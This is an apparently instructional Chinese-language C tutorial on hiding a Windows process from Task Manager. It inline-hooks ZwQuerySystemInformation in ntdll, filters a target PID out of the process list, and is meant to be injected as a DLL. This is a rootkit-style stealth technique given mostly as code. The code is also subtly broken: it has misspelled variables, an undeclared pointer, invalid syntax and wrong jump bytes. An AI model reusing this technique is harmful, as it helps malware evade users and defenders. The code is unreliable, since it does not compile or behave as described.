// 在Windows中，用户进程的所有操作都是基于WIN32 API来实现的，例如使用任务管理器来查看进程等操作。
// API HOOK技术是一种改变API执行结果的技术。

// PS：ZwQuerySystemInformation函数：
// 功能：获取指定的系统信息。
// 原型：NTSTASTUS WINAPI ZwQuerySystemInformation (
//          _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass,
//          _Inout_ PVOID SystemInformaion,
//          _In_ ULONG SystemInformationLength,
//          _Out_opt_ PULONG ReturnLength
//       )
// 参数：SystemInformationClass：要检索系统的信息类型，比如检索进程信息，使用SystemProcessInformation(枚举值为5)。
//       SystemInformation：缓存区，用于接收请求的信息，缓存区的大小和结构取决于SystemInformationClass参数。
//       SystemInformationLength：缓存区大小。
//       ReturnLength：获取函数写入信息的实际大小。
// 结果：成功，返回STATUS_SUCCESS，失败，返回NTSTATUS错误码。

// PS：利用ZwQuerySystemInformation实现进程隐藏的原理：
//     遍历进程使用的EnumProcess和CreateToolhelp32Snapshot函数，其底层都是利用ZwQuerySystemInformation,设置标志位SystemProcessInformation
//     来查询进程信息的。所以，可以利用inline hook技术通过修改ZwQuerySystemInformation入口地址，让其指向自定义的New_ZwQuerySystemInformation函数,
//     在该函数内部调用ZwQuerySystemInformation,如果是查询进程并且进程ID与目标隐藏进程的ID相同，则可以过滤掉该进程的信息，从而实现进程隐藏。

// PS：INLINE HOOK技术：
// inline hook API的核心原理是在获取进程中指定API函数的地址后，修改该API的入口函数地址的前几个字节数据，写入一个跳转指令，使其跳转到自定义的新函数中去执行。

// PS：区分32位系统和64位系统，因为32位系统和64位指针长度是不一样的，这导致地址长度也不同。32位系统中用4个字节表示地址，64位系统中用8个字节表示地址。

// 在32位系统中，汇编跳转语句可写为：jmp _dwNewAddress，对应的机器码为：e9 _dwOffset(跳转偏移，使用相对地址) _dwOffset = _dwNewAddress - _dwAddress。
// 在64位系统中，汇编跳转语句可谢伟：mov rax, _ullNewAddress(长地址，使用绝对地址) jmp rax，对应的机器码为：48 b4 _ullNewAddress

// 所以，要想进行inline hook,32位系统需要更改函数的前5个字节数据；64位系统，需要更改前12个字节数据。

// PS：inline hook的具体流程：
//     1.首先，先获取API函数的地址。可以从进程中获取HOOK API对应的模块地址(使用GetModuleHandle函数)，然后，通过GetProcAddress获取API函数在进程中的地址。
//     2.然后，根据32位和64位版本，计算需要修改HOOK API函数的前几个字节数据。若是32位系统，则需要计算跳转偏移，并修改函数的前5个字节数据，
//       若是64位系统，则需要修改函数的前12字节数据。
//     3.接着，修改API函数的前几个字节数据的页面保护属性，更改为可读、可写、可执行，这样是为了确保修改后内存能够执行。
//     4.最后，为了能够还原操作，要在修改数据前先对数据进行备份，然后再修改数据，并还原页面保护属性。

// PS：UNHOOK和HOOK的流程是一样，唯一区别是UNHOOK写入的数据是HOOK操作备份的前几个字节数据。这样，API函数便可恢复正常。

// 示例代码：

void HookApi()
{
    // 获取ntdll.dll的加载基址，若没有则返回
    HMODULE hDll = ::GetModuleHandle("ntdll.dll");
    if (NULL == hDll)
        return ;

    // 获取ZwQuerySystemInformation函数地址
    typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
    if (NULL == zwQuerySystemInformation)
        return ;

    // 32为系统修改前5个字节，64位系统修改前12个字节
    #ifndef _WIN64
        BYTE pData[5] = {0xe9, 0, 0, 0, 0};
        DWORD dwOffset = (DWORD)New_ZwQuerySystemInformation - (DWORD)ZwQuerySystemInformation - 5;
        ::RtlCopyMemory(&pData[1], &dwOffset, sizeof(dwOffset));
        // 保存前5个字节数据
        ::RtlCopyMemory(g_OldData32, ZwQuerySystemInformation, sizeof(pData));
    #else
        BYTE pData[12] = {0x48, 0xb8, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0x0};
        ULONGLONG ullOffset = (ULONGLONG)New_ZwQuerySystemInformation;
        ::RtlCopyMemory(&pData[2], &ullOffset, sizeof(ullOffset));
        // 保存前12个字节
        ::RtlCopyMemory(g_OldData64, ZwQuerySystemInformation, sizeof(pData));
    #endif

    // 设置页面的保护属性为可读、可写、可执行
    DWORD dwOldProctect = 0;
    ::VirtualProtect(ZwQuerySystemInformation, sizeof(pData), PAGE_EXECUTE_READWRITE, &dwOldProtect);

    // 修改
    ::RtlCopyMemory(ZwQuerySystemInformation, pData, sizeof(pData));

    // 还原页面保护属性
    ::VirtualProtect(ZwQuerySytemInformation, sizeof(pData), dwOldProtect, &dwOldProtect);
}

// PS：ZwQuerySystemInformation HOOK函数：

// 示例代码

NTSTATUS WINAPI New_ZwQuerySystemInformation(
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength )
{
    NTSTATUS status = STATUS_SUCCESS;
    PSYSTEM_PROCESS_INFORMATION pCur = NULL;

    // 要隐藏的进程PID
    DWORD dwHideProcessId = 1224;

    // UNHOOK API
    UnhookApi();

    // 获取ntdll.dll模块
    HMODULE hDll = ::GetModuleHandle("ntdll.dll");
    if (NULL == hDll)
        return status;

    // 获取ZwQuerySystemInformation函数地址
    typedef_ZwQuerySystemInformation ZwQuerySystemInformation = (typedef_ZwQuerySystemInformation)::GetProcAddress(hDll, "ZwQuerySystemInformation");
    if (NULL == ZwQuerySystemInformation)
        return status;

    // 调用原函数ZwQuerySystemInformation
    status = ZwQuerySystemInformation(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);

    // 判断是否是进程遍历
    if (NT_SUCCESS(status) && (5 == SystemInformationClass))
    {
        pCur = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
        
        // 遍历，剔除隐藏进程的信息
        while (TRUE)
        {
            // 判断是否是要隐藏的进程PID
            if (dwHideProcessId == (DWORD)pCur->UniqueProcessId)
            {
                if (0 == pCur->NextEntryOffset)
                {
                    // 末尾元素
                    pPrev->NextEntryOffset = 0;
                }
                else
                {
                    pPrev->NextEntryOffset = pPrev=>NextEntryOffset + pCur->NextEntryOffset;
                }
            }
            else 
            {
                pPrev = pCur;
            }
            
            // 退出条件
            if (0 == pCur->NextEntryOffset)
                break;

            pCur = (PSYSTEM_PROCESS_INFORMATION)((PBYTE*)pCur + pCur->NextEntryOffset);
        }
    }

    // HOOK Api
    HookApi();

    return status;
}

// PS：以上的代码需写入DLL文件，注入到要遍历进程的程序中，比如任务管理器，才能够实现进程隐藏。